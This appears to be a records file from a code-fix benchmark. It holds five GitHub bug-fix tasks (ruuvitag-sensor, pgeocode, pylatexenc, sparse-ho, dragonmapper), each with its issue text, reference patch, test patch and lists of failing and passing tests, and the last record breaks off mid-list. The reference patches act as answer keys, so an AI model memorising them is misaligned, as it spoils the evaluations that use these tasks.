2018-07-27 20:03:35+00:00
|
mit
| 298
|
|
ttu__ruuvitag-sensor-41
|
diff --git a/ruuvitag_sensor/ruuvi.py b/ruuvitag_sensor/ruuvi.py
index ffd6bc6..0dffc62 100644
--- a/ruuvitag_sensor/ruuvi.py
+++ b/ruuvitag_sensor/ruuvi.py
@@ -202,13 +202,12 @@ class RuuviTagSensor(object):
Returns:
string: Sensor data
"""
+ # Search of FF990403 (Manufacturer Specific Data (FF) / Ruuvi Innovations ltd (9904) / Format 3 (03))
try:
- if len(raw) != 54:
+ if "FF990403" not in raw:
return None
- if raw[16:18] != '03':
- return None
-
- return raw[16:]
+ payload_start = raw.index("FF990403") + 6;
+ return raw[payload_start:]
except:
return None
|
ttu/ruuvitag-sensor
|
c0d986391149d31d60d9649cfd9f3946db92a50c
|
diff --git a/tests/test_decoder.py b/tests/test_decoder.py
index cd92d1d..639b71a 100644
--- a/tests/test_decoder.py
+++ b/tests/test_decoder.py
@@ -51,6 +51,16 @@ class TestDecoder(TestCase):
self.assertNotEqual(data['acceleration_y'], 0)
self.assertNotEqual(data['acceleration_z'], 0)
+ data = decoder.decode_data('03291A1ECE1EFC18F94202CA0B53BB')
+ self.assertEqual(data['temperature'], 26.3)
+ self.assertEqual(data['pressure'], 1027.66)
+ self.assertEqual(data['humidity'], 20.5)
+ self.assertEqual(data['battery'], 2899)
+ self.assertNotEqual(data['acceleration'], 0)
+ self.assertEqual(data['acceleration_x'], -1000)
+ self.assertNotEqual(data['acceleration_y'], 0)
+ self.assertNotEqual(data['acceleration_z'], 0)
+
def test_df3decode_is_valid_max_values(self):
decoder = Df3Decoder()
humidity = 'C8'
diff --git a/tests/test_ruuvitag_sensor.py b/tests/test_ruuvitag_sensor.py
index ac9e3bb..16fcbc0 100644
--- a/tests/test_ruuvitag_sensor.py
+++ b/tests/test_ruuvitag_sensor.py
@@ -47,7 +47,8 @@ class TestRuuviTagSensor(TestCase):
('CC:2C:6A:1E:59:3D', '1E0201060303AAFE1616AAFE10EE037275752E76692F23416A7759414D4663CD'),
('DD:2C:6A:1E:59:3D', '1E0201060303AAFE1616AAFE10EE037275752E76692F23416A7759414D4663CD'),
('EE:2C:6A:1E:59:3D', '1F0201060303AAFE1716AAFE10F9037275752E76692F23416A5558314D417730C3'),
- ('FF:2C:6A:1E:59:3D', '1902010415FF990403291A1ECE1E02DEF94202CA0B5300000000BB')
+ ('FF:2C:6A:1E:59:3D', '1902010415FF990403291A1ECE1E02DEF94202CA0B5300000000BB'),
+ ('00:2C:6A:1E:59:3D', '1902010415FF990403291A1ECE1E02DEF94202CA0B53BB')
]
for data in datas:
@@ -59,7 +60,7 @@ class TestRuuviTagSensor(TestCase):
get_datas)
def test_find_tags(self):
tags = RuuviTagSensor.find_ruuvitags()
- self.assertEqual(5, len(tags))
+ self.assertEqual(6, len(tags))
@patch('ruuvitag_sensor.ble_communication.BleCommunicationDummy.get_datas',
get_datas)
@@ -87,7 +88,7 @@ class TestRuuviTagSensor(TestCase):
def test_get_datas(self):
datas = []
RuuviTagSensor.get_datas(lambda x: datas.append(x))
- self.assertEqual(5, len(datas))
+ self.assertEqual(6, len(datas))
@patch('ruuvitag_sensor.ble_communication.BleCommunicationDummy.get_datas',
get_datas)
|
Bug: incompatible with RuuviFW 1.2.8
The 1.2.8 update to the Ruuvi firmware trims extra NULLs at the end of the transmission, which breaks the data-format type check. I can fix this and implement #29.
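The patch above replaces the fixed-length check with a search for the manufacturer-specific marker; a self-contained sketch of the same idea (the function name is illustrative):
```python
def get_data_format_3_payload(raw):
    # Look for FF990403 (FF = Manufacturer Specific Data, 9904 = Ruuvi Innovations,
    # 03 = Data Format 3) instead of relying on a fixed message length, so
    # trailing-NULL trimming in firmware 1.2.8 no longer matters.
    marker = "FF990403"
    if marker not in raw:
        return None
    payload_start = raw.index(marker) + 6  # skip "FF9904", keep the format byte "03" onward
    return raw[payload_start:]

# Old (padded) and new (trimmed) advertisements yield the same payload prefix:
print(get_data_format_3_payload("1902010415FF990403291A1ECE1E02DEF94202CA0B5300000000BB"))
print(get_data_format_3_payload("1902010415FF990403291A1ECE1E02DEF94202CA0B53BB"))
```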
|
0.0
|
c0d986391149d31d60d9649cfd9f3946db92a50c
|
[
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_find_tags",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_get_datas"
] |
[
"tests/test_decoder.py::TestDecoder::test_decode_is_valid",
"tests/test_decoder.py::TestDecoder::test_decode_is_valid_case2",
"tests/test_decoder.py::TestDecoder::test_decode_is_valid_weatherstation_2017_04_12",
"tests/test_decoder.py::TestDecoder::test_df3decode_is_valid",
"tests/test_decoder.py::TestDecoder::test_df3decode_is_valid_max_values",
"tests/test_decoder.py::TestDecoder::test_df3decode_is_valid_min_values",
"tests/test_decoder.py::TestDecoder::test_getcorrectdecoder",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_convert_data_not_valid",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_false_mac_raise_error",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_get_data_for_sensors",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_get_datas_with_macs",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_tag_correct_properties",
"tests/test_ruuvitag_sensor.py::TestRuuviTagSensor::test_tag_update_is_valid"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_issue_reference"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-04-19 15:39:25+00:00
|
mit
| 6,104
|
|
symerio__pgeocode-62
|
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 683a3c0..088341d 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,12 @@
- The minimum supported Python version is updated to Python 3.8
[#65](https://github.com/symerio/pgeocode/pull/65)
+ - Fix error in latitude grouping when creating a unique postcode index.
+ With this fix `Nominatim(.., unique=True)` correctly computes the average
+ latitude for each postcode (if multiple localities share the same postcode),
+ instead of taking the first latitude value.
+ [#62](https://github.com/symerio/pgeocode/pull/62)
+
- The default folder to store downloaded data is changed to `~/.cache/pgeocode/`.
This default can still be changed by setting the `PGEOCODE_DATA_DIR` environment variable.
[#51](https://github.com/symerio/pgeocode/pull/51)
diff --git a/pgeocode.py b/pgeocode.py
index 65f8ffd..4f9aab3 100644
--- a/pgeocode.py
+++ b/pgeocode.py
@@ -252,7 +252,7 @@ class Nominatim:
df_unique_cp_group = self._data.groupby("postal_code")
data_unique = df_unique_cp_group[["latitude", "longitude"]].mean()
valid_keys = set(DATA_FIELDS).difference(
- ["place_name", "lattitude", "longitude", "postal_code"]
+ ["place_name", "latitude", "longitude", "postal_code"]
)
data_unique["place_name"] = df_unique_cp_group["place_name"].apply(
lambda x: ", ".join([str(el) for el in x])
|
symerio/pgeocode
|
fda231859ae17c7282a9d90c0e2b5b3cde1eb01d
|
diff --git a/test_pgeocode.py b/test_pgeocode.py
index b6fe453..1bfdcbf 100644
--- a/test_pgeocode.py
+++ b/test_pgeocode.py
@@ -261,3 +261,60 @@ def test_first_url_fails(httpserver, monkeypatch, temp_dir):
with pytest.warns(UserWarning, match=msg):
Nominatim("ie")
httpserver.check_assertions()
+
+
+def test_unique_index_pcode(tmp_path):
+ """Check that a centroid is computed both for latitude and longitude
+
+ Regression test for https://github.com/symerio/pgeocode/pull/62
+ """
+
+ class MockNominatim(Nominatim):
+ def __init__(self):
+ pass
+
+ data = pd.DataFrame(
+ {
+ "postal_code": ["1", "1", "2", "2"],
+ "latitude": [1.0, 2.0, 3.0, 4],
+ "longitude": [5.0, 6.0, 7.0, 8],
+ "place_name": ["a", "b", "c", "d"],
+ "state_name": ["a", "b", "c", "d"],
+ "country_name": ["a", "b", "c", "d"],
+ "county_name": ["a", "b", "c", "d"],
+ "community_name": ["a", "b", "c", "d"],
+ "accuracy": [1, 2, 3, 4],
+ "country_code": [1, 2, 3, 4],
+ "county_code": [1, 2, 3, 4],
+ "state_code": [1, 2, 3, 4],
+ "community_code": [1, 2, 3, 4],
+ }
+ )
+
+ nominatim = MockNominatim()
+ data_path = tmp_path / "a.txt"
+ nominatim._data_path = str(data_path)
+ nominatim._data = data
+ data_unique = nominatim._index_postal_codes()
+
+ data_unique_expected = pd.DataFrame(
+ {
+ "postal_code": ["1", "2"],
+ "latitude": [1.5, 3.5],
+ "longitude": [5.5, 7.5],
+ "place_name": ["a, b", "c, d"],
+ "state_name": ["a", "c"],
+ # We don't include the country_name for some reason?
+ # 'country_name': ['a', 'c'],
+ "county_name": ["a", "c"],
+ "community_name": ["a", "c"],
+ "accuracy": [1, 3],
+ "country_code": [1, 3],
+ "county_code": [1, 3],
+ "state_code": [1, 3],
+ "community_code": [1, 3],
+ }
+ )
+ pd.testing.assert_frame_equal(
+ data_unique.sort_index(axis=1), data_unique_expected.sort_index(axis=1)
+ )
|
incorrect centroid in query_postal_code for duplicate postal code entries
query_postal_code averages the longitude across duplicate entries but returns the first latitude.
nomi.query_postal_code("41-800")
That's from the GeoNames file:
41-800 returns two locations:
PL, 41-800, 50.2817, 18.6745
PL,41-800, 50.3055, 18.778
After running: nomi.query_postal_code("41-800")
postal_code 41-800
place_name Gliwice, Zabrze
latitude 50.2817
longitude 18.7263
The reported longitude is the sum of the file's longitudes divided by the number of results (i.e. the average), while the reported latitude is just the first entry's value.
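For illustration, using the two GeoNames rows quoted above and plain pandas: the expected centroid is a group-by mean over both coordinate columns. The one-character fix in the patch ("lattitude" corrected to "latitude" in the exclusion list) is what lets the averaged latitude survive instead of being overwritten by the first row's value.
```python
import pandas as pd

data = pd.DataFrame({
    "postal_code": ["41-800", "41-800"],
    "latitude":    [50.2817, 50.3055],
    "longitude":   [18.6745, 18.778],
})

# Expected behaviour: average *both* coordinates per postal code.
centroids = data.groupby("postal_code")[["latitude", "longitude"]].mean()
print(centroids.loc["41-800", "latitude"])   # 50.2936  (not 50.2817, the first row)
print(centroids.loc["41-800", "longitude"])  # 18.72625
```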
|
0.0
|
fda231859ae17c7282a9d90c0e2b5b3cde1eb01d
|
[
"test_pgeocode.py::test_unique_index_pcode"
] |
[
"test_pgeocode.py::test_countries[FR-91120-Palaiseau-67000-Strasbourg-400]",
"test_pgeocode.py::test_countries[GB-WC2N",
"test_pgeocode.py::test_countries[AU-6837-Perth-3000-melbourne-2722]",
"test_pgeocode.py::test_countries[AU-6837-Perth-0221-Barton-3089]",
"test_pgeocode.py::test_countries[US-60605-Chicago-94103-San",
"test_pgeocode.py::test_countries[CA-M5R",
"test_pgeocode.py::test_download_dataset",
"test_pgeocode.py::test_nominatim_query_postal_code",
"test_pgeocode.py::test_nominatim_query_postal_code_multiple",
"test_pgeocode.py::test_nominatim_distance_postal_code",
"test_pgeocode.py::test_cdn[geonames]",
"test_pgeocode.py::test_cdn[gitlab-pages]"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-06-16 08:54:33+00:00
|
bsd-3-clause
| 5,821
|
|
phfaist__pylatexenc-4
|
diff --git a/pylatexenc/latex2text.py b/pylatexenc/latex2text.py
index 874ae8d..da2694e 100644
--- a/pylatexenc/latex2text.py
+++ b/pylatexenc/latex2text.py
@@ -23,11 +23,17 @@
#
+from __future__ import print_function, absolute_import
import os
import re
import unicodedata
-import latexwalker
import logging
+import sys
+if sys.version_info.major > 2:
+ def unicode(string): return string
+ basestring = str
+
+from pylatexenc import latexwalker
logger = logging.getLogger(__name__);
@@ -498,7 +504,7 @@ class LatexNodes2Text(object):
#
if (len(n.nodeargs) != 1):
- logger.warning(ur"Expected exactly one argument for '\input' ! Got = %r", n.nodeargs)
+ logger.warning(u"Expected exactly one argument for '\\input' ! Got = %r", n.nodeargs)
inputtex = self.read_input_file(self.nodelist_to_text([n.nodeargs[0]]).strip())
@@ -663,17 +669,17 @@ if __name__ == '__main__':
import fileinput
- print "Please type some latex text (Ctrl+D twice to stop) ..."
+ print("Please type some latex text (Ctrl+D twice to stop) ...")
latex = ''
for line in fileinput.input():
latex += line;
- print '\n--- WORDS ---\n'
- print latex2text(latex.decode('utf-8')#, keep_inline_math=True
- ).encode('utf-8')
- print '\n-------------\n'
+ print('\n--- WORDS ---\n')
+ print(latex2text(latex.decode('utf-8')#, keep_inline_math=True
+ ).encode('utf-8'))
+ print('\n-------------\n')
except:
import pdb;
@@ -681,8 +687,8 @@ if __name__ == '__main__':
import sys;
(exc_type, exc_value, exc_traceback) = sys.exc_info()
- print "\nEXCEPTION: " + unicode(sys.exc_value) + "\n"
-
+ print("\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n")
+
pdb.post_mortem()
diff --git a/pylatexenc/latexencode.py b/pylatexenc/latexencode.py
index 0b54878..98b87fb 100644
--- a/pylatexenc/latexencode.py
+++ b/pylatexenc/latexencode.py
@@ -24,8 +24,13 @@
#
+from __future__ import print_function, absolute_import
import unicodedata;
import logging
+import sys
+if sys.version_info.major > 2:
+ def unicode(string): return string
+ basestring = str
log = logging.getLogger(__name__)
@@ -873,20 +878,20 @@ if __name__ == '__main__':
import fileinput
- print "Please type some unicode text (Ctrl+D twice to stop) ..."
+ print("Please type some unicode text (Ctrl+D twice to stop) ...")
latex = ''
for line in fileinput.input():
latex += line;
- print '\n--- LATEX ---\n'
- print utf8tolatex(latex.decode('utf-8')).encode('utf-8')
- print '\n-------------\n'
+ print('\n--- LATEX ---\n')
+ print(utf8tolatex(latex.decode('utf-8')).encode('utf-8'))
+ print('\n-------------\n')
except:
import pdb;
import sys;
- print "\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n"
+ print("\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n")
pdb.post_mortem()
diff --git a/pylatexenc/latexwalker.py b/pylatexenc/latexwalker.py
index eef3e4b..7fcbe3f 100644
--- a/pylatexenc/latexwalker.py
+++ b/pylatexenc/latexwalker.py
@@ -23,12 +23,16 @@
#
+from __future__ import print_function, absolute_import
import logging
logger = logging.getLogger(__name__)
import re
from collections import namedtuple
-
+import sys
+if sys.version_info.major > 2:
+ def unicode(string): return string
+ basestring = str
class LatexWalkerError(Exception):
@@ -1223,9 +1227,9 @@ def disp_node(n, indent=0, context='* ', skip_group=False):
title = '\\begin{%s}' %(n.envname)
iterchildren.append(('* ', n.nodelist, False));
else:
- print "UNKNOWN NODE TYPE: %s"%(n.nodeType().__name__)
+ print("UNKNOWN NODE TYPE: %s"%(n.nodeType().__name__))
- print ' '*indent + context + title + ' '+comment
+ print(' '*indent + context + title + ' '+comment)
for context, nodelist, skip in iterchildren:
for nn in nodelist:
@@ -1252,18 +1256,18 @@ if __name__ == '__main__':
(nodes, pos, llen) = get_latex_nodes(latex);
- print '\n--- NODES ---\n'
- print repr(nodes);
- print '\n-------------\n'
+ print('\n--- NODES ---\n')
+ print(repr(nodes))
+ print('\n-------------\n')
- print '\n--- NODES ---\n'
+ print('\n--- NODES ---\n')
for n in nodes:
disp_node(n)
- print '\n-------------\n'
+ print('\n-------------\n')
except:
import pdb;
import sys;
- print "\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n"
+ print("\nEXCEPTION: " + unicode(sys.exc_info()[1]) + "\n")
pdb.post_mortem()
|
phfaist/pylatexenc
|
9919400250e204e7990821210c8c0035bede2eaa
|
diff --git a/test/test_latexwalker.py b/test/test_latexwalker.py
index 5acf7d3..2be6f0f 100644
--- a/test/test_latexwalker.py
+++ b/test/test_latexwalker.py
@@ -1,4 +1,8 @@
import unittest
+import sys
+if sys.version_info.major > 2:
+ def unicode(string): return string
+ basestring = str
from pylatexenc.latexwalker import (
MacrosDef, LatexWalker, LatexToken, LatexCharsNode, LatexGroupNode, LatexCommentNode,
|
ur"Expected exactly (...)" string gives SyntaxError: invalid syntax
Got a syntax error when importing the `pylatexenc.latex2text` module (Python 3.6, Mac, Anaconda3 distribution):
```
import pylatexenc.latex2text
File "/Users/rasmus/anaconda/envs/tts/lib/python3.6/site-packages/pylatexenc/latex2text.py", line 501
logger.warning(ur"Expected exactly one argument for '\input' ! Got = %r", n.nodeargs)
^
SyntaxError: invalid syntax
```
Python 3 does not support the `ur` prefix. To fix, use either a `u` or an `r` string, but not both prefixes together.
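A small standalone check of the claim (not repository code): the combined prefix is rejected at compile time in Python 3, while a plain u string with an escaped backslash carries the same message.
```python
# The combined "ur" prefix is a compile-time error in Python 3:
try:
    compile('msg = ur"Expected exactly one argument"', "<test>", "exec")
except SyntaxError as exc:
    print("ur prefix rejected:", exc.msg)

# A u (or r) string on its own works; the backslash just needs escaping:
msg = u"Expected exactly one argument for '\\input' ! Got = %r"
print(msg % (["only", "one"],))
```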
|
0.0
|
9919400250e204e7990821210c8c0035bede2eaa
|
[
"test/test_latexwalker.py::TestLatexWalker::test_errors",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_braced_group",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_environment",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_expression",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_maybe_optional_arg",
"test/test_latexwalker.py::TestLatexWalker::test_get_latex_nodes",
"test/test_latexwalker.py::TestLatexWalker::test_get_token"
] |
[] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2017-02-16 22:40:59+00:00
|
mit
| 4,534
|
|
QB3__sparse-ho-67
|
diff --git a/doc/api.rst b/doc/api.rst
index 6cde70a..55810a7 100644
--- a/doc/api.rst
+++ b/doc/api.rst
@@ -44,7 +44,7 @@ Criterion
:toctree: generated/
HeldOutMSE
- SmoothedSURE
+ FiniteDiffMonteCarloSure
HeldOutLogistic
diff --git a/sparse_ho/criterion/__init__.py b/sparse_ho/criterion/__init__.py
index 1402e4e..8e96d7e 100644
--- a/sparse_ho/criterion/__init__.py
+++ b/sparse_ho/criterion/__init__.py
@@ -1,11 +1,11 @@
from sparse_ho.criterion.held_out import HeldOutMSE, HeldOutLogistic
from sparse_ho.criterion.cross_val import CrossVal
-from sparse_ho.criterion.sure import SmoothedSURE
+from sparse_ho.criterion.sure import FiniteDiffMonteCarloSure
from sparse_ho.criterion.held_out import HeldOutSmoothedHinge
from sparse_ho.criterion.multiclass_logreg import LogisticMulticlass
__all__ = ['CrossVal',
- 'SmoothedSURE',
+ 'FiniteDiffMonteCarloSure',
'HeldOutMSE',
'HeldOutLogistic',
'HeldOutSmoothedHinge',
diff --git a/sparse_ho/criterion/sure.py b/sparse_ho/criterion/sure.py
index 3719b75..980ad11 100644
--- a/sparse_ho/criterion/sure.py
+++ b/sparse_ho/criterion/sure.py
@@ -5,7 +5,7 @@ from sparse_ho.algo.forward import get_beta_jac_iterdiff
from sparse_ho.criterion.base import BaseCriterion
-class SmoothedSURE(BaseCriterion):
+class FiniteDiffMonteCarloSure(BaseCriterion):
"""Smoothed version of the Stein Unbiased Risk Estimator (SURE).
Implements the iterative Finite-Difference Monte-Carlo approximation of the
|
QB3/sparse-ho
|
59197a06f2ba62b4fd67b9d8950dc62674eed2a1
|
diff --git a/sparse_ho/tests/test_grad_search.py b/sparse_ho/tests/test_grad_search.py
index 492c04b..a8537f7 100644
--- a/sparse_ho/tests/test_grad_search.py
+++ b/sparse_ho/tests/test_grad_search.py
@@ -10,7 +10,7 @@ from sparse_ho.models import Lasso
from sparse_ho import Forward
from sparse_ho import ImplicitForward
from sparse_ho import Implicit
-from sparse_ho.criterion import HeldOutMSE, SmoothedSURE
+from sparse_ho.criterion import HeldOutMSE, FiniteDiffMonteCarloSure
from sparse_ho.ho import grad_search
from sparse_ho.optimizers import LineSearch
@@ -64,7 +64,7 @@ def test_grad_search(model, crit):
criterion = HeldOutMSE(idx_train, idx_val)
else:
n_outer = 2
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
# TODO MM@QBE if else scheme surprising
criterion = HeldOutMSE(idx_train, idx_val)
diff --git a/sparse_ho/tests/test_grid_search.py b/sparse_ho/tests/test_grid_search.py
index 2e1d6c6..4df0ff7 100644
--- a/sparse_ho/tests/test_grid_search.py
+++ b/sparse_ho/tests/test_grid_search.py
@@ -6,7 +6,7 @@ from sparse_ho.utils import Monitor
from sparse_ho.datasets import get_synt_data
from sparse_ho.models import Lasso
from sparse_ho import Forward
-from sparse_ho.criterion import HeldOutMSE, SmoothedSURE
+from sparse_ho.criterion import HeldOutMSE, FiniteDiffMonteCarloSure
from sparse_ho.grid_search import grid_search
@@ -69,7 +69,7 @@ def test_grid_search():
monitor_grid = Monitor()
model = Lasso(estimator=estimator)
- criterion = SmoothedSURE(sigma=sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma=sigma_star)
algo = Forward()
log_alpha_opt_grid, _ = grid_search(
algo, criterion, model, X, y, log_alpha_min, log_alpha_max,
@@ -77,7 +77,7 @@ def test_grid_search():
tol=1e-5, samp="grid")
monitor_random = Monitor()
- criterion = SmoothedSURE(sigma=sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma=sigma_star)
algo = Forward()
log_alpha_opt_random, _ = grid_search(
algo, criterion, model, X, y, log_alpha_min, log_alpha_max,
diff --git a/sparse_ho/tests/test_lasso.py b/sparse_ho/tests/test_lasso.py
index 8852e2d..8553435 100644
--- a/sparse_ho/tests/test_lasso.py
+++ b/sparse_ho/tests/test_lasso.py
@@ -13,7 +13,7 @@ from sparse_ho import Forward
from sparse_ho import ImplicitForward
from sparse_ho import Implicit
from sparse_ho import Backward
-from sparse_ho.criterion import HeldOutMSE, SmoothedSURE
+from sparse_ho.criterion import HeldOutMSE, FiniteDiffMonteCarloSure
n_samples = 100
n_features = 100
@@ -160,22 +160,22 @@ def test_val_grad():
for key in models.keys():
log_alpha = dict_log_alpha[key]
model = models[key]
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
algo = Forward()
val_fwd, grad_fwd = criterion.get_val_grad(
model, X, y, log_alpha, algo.get_beta_jac_v, tol=tol)
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
algo = ImplicitForward(tol_jac=1e-8, n_iter_jac=5000)
val_imp_fwd, grad_imp_fwd = criterion.get_val_grad(
model, X, y, log_alpha, algo.get_beta_jac_v, tol=tol)
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
algo = Implicit(criterion)
val_imp, grad_imp = criterion.get_val_grad(
model, X, y, log_alpha, algo.get_beta_jac_v, tol=tol)
- criterion = SmoothedSURE(sigma_star)
+ criterion = FiniteDiffMonteCarloSure(sigma_star)
algo = Backward()
val_bwd, grad_bwd = criterion.get_val_grad(
model, X, y, log_alpha, algo.get_beta_jac_v, tol=tol)
|
SURE naming / API / generalization
Consider renaming `SURE` to something more in line with the implementation. The current implementation follows [(Figure 3, Deledalle et al. 2020)](https://samuelvaiter.com/publications/deledalle2014sugar.pdf) by
implementing a smoothed version using the Finite Difference Monte Carlo (FDMC)
method. A user testing the class might be confused to see that, in low dimension,
a manually implemented SURE does not give the same value as our `SURE` class.
I believe there are three possible options:
1. _Keep the current name._ This is probably the best way not to confuse people
unfamiliar with the SURE. But in this case the documentation should state
precisely why a user could observe a difference with a handcrafted SURE.
2. _Change the name to one relevant to the literature._ The most exact would be
`FdmcSure`, but that is a bit obscure, and `FiniteDifferenceMonteCarloSure` is
maybe too verbose. Another option is to use SUGAR, as it is easy to search for.
The issue is that SUGAR relates to the gradient of the criterion, which could
also be confusing.
3. _Change the name to something clearer._ Maybe `Smooth[ed]Sure` could be a
candidate, but this terminology does not appear in papers.
### Parameters
- I don't understand why `SURE` takes `X_test` and `X_test` as parameters.
- Regarding `C` and `gamma_sure`: I believe it is not useful to expose them as
parameters. Either the user does not want to play with them, in which case two
optional parameters are too many, or they really want to control the
finite-difference step, in which case it is easier to access the member
`epsilon` directly. The power law is advocated in the SUGAR paper, but
different strategies could be used.
### Generalised SURE
It does not seem to be a priority, but this class could implement
generalizations of the SURE to approximate the prediction risk and/or the
estimation risk, depending on the properties of `X`, which could be of interest
for some uses (imaging, for instance).
WDYT?
|
0.0
|
59197a06f2ba62b4fd67b9d8950dc62674eed2a1
|
[
"sparse_ho/tests/test_grid_search.py::test_grid_search"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-01-11 11:34:40+00:00
|
bsd-3-clause
| 570
|
|
tsroten__dragonmapper-24
|
diff --git a/dragonmapper/data/transcriptions.csv b/dragonmapper/data/transcriptions.csv
index 6447017..072be78 100644
--- a/dragonmapper/data/transcriptions.csv
+++ b/dragonmapper/data/transcriptions.csv
@@ -234,6 +234,7 @@ nun,ㄋㄨㄣ,nwən
nuo,ㄋㄨㄛ,nwɔ
nü,ㄋㄩ,ny
nüe,ㄋㄩㄝ,nɥœ
+o,ㄛ,ɔ
ou,ㄡ,oʊ
pa,ㄆㄚ,pʰa
pai,ㄆㄞ,pʰaɪ
|
tsroten/dragonmapper
|
0f58b30f65718494afb1de9cb25d68d5b3246a0f
|
diff --git a/dragonmapper/tests/test-transcriptions.py b/dragonmapper/tests/test-transcriptions.py
index a4d5e14..04a5733 100644
--- a/dragonmapper/tests/test-transcriptions.py
+++ b/dragonmapper/tests/test-transcriptions.py
@@ -173,3 +173,9 @@ class TestConvertFunctions(unittest.TestCase):
numbered = 'Ao4di4li4'
self.assertEqual(numbered, trans.accented_to_numbered(accented))
+
+ def test_issue_23(self):
+ pinyin = 'ó'
+ zhuyin = 'ㄛˊ'
+
+ self.assertEqual(zhuyin, trans.pinyin_to_zhuyin(pinyin))
|
Pinyin/Zhuyin/IPA syllable `o` is missing.
```python
>>> print(transcriptions.pinyin_to_zhuyin(ó))
Traceback (most recent call last):
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 100, in <module>
print(printBopomofo(eachLine)+"\n"*3)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 42, in printBopomofo
bopomofoDictionary=makeToneDictionary(hanzistring2)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 35, in makeToneDictionary
bopomofoList=listBopomofo(hanzi)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 11, in listBopomofo
print(transcriptions.pinyin_to_zhuyin(ó))
NameError: name 'ó' is not defined
```
Also, the following string returns an error:
```
(1 4 事情是這樣的 , 父親讀到也看到許多偉大而奇妙的事時 , 他向主高呼許多事 , 諸如 : 哦 , 主神全能者 , 您的事工多麼偉大而奇妙 ! 您的寶座在高天之上 , 您的大能、良善和慈悲廣被世上全民 , 而且 , 由於您的慈悲 , 您不會讓歸向您的人滅亡 ! )
```
```python
>>> pinyin=hanzi.to_zhuyin(hanzistring)
Traceback (most recent call last):
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\transcriptions.py", line 227, in pinyin_syllable_to_zhuyin
zhuyin_syllable = _PINYIN_MAP[pinyin_syllable.lower()]['Zhuyin']
KeyError: 'o'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 100, in <module>
print(printBopomofo(eachLine)+"\n"*3)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 42, in printBopomofo
bopomofoDictionary=makeToneDictionary(hanzistring2)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 35, in makeToneDictionary
bopomofoList=listBopomofo(hanzi)
File "D:\OneDrive\My Programs\zhuyin converter\Convert2BopomofoPunctuation.py", line 12, in listBopomofo
pinyin=hanzi.to_zhuyin(hanzistring)
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\hanzi.py", line 190, in to_zhuyin
zhuyin = pinyin_to_zhuyin(numbered_pinyin)
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\transcriptions.py", line 365, in pinyin_to_zhuyin
remove_apostrophes=True, separate_syllables=True)
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\transcriptions.py", line 341, in _convert
new += syllable_function(match.group())
File "C:\Users\Kei\AppData\Local\Programs\Python\Python35\lib\site-packages\dragonmapper\transcriptions.py", line 229, in pinyin_syllable_to_zhuyin
raise ValueError('Not a valid syllable: %s' % s)
ValueError: Not a valid syllable: o2
```
|
0.0
|
0f58b30f65718494afb1de9cb25d68d5b3246a0f
|
[
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_23"
] |
[
"dragonmapper/tests/test-transcriptions.py::TestIdentifyFunctions::test_is_zhuyin",
"dragonmapper/tests/test-transcriptions.py::TestIdentifyFunctions::test_is_zhuyin_compatible",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_drop_apostrophe",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_handle_middle_dot",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_ipa_to_pinyin",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_ipa_to_zhuyin",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_2",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_3",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_4",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_5",
"dragonmapper/tests/test-transcriptions.py::TestConvertFunctions::test_issue_6",
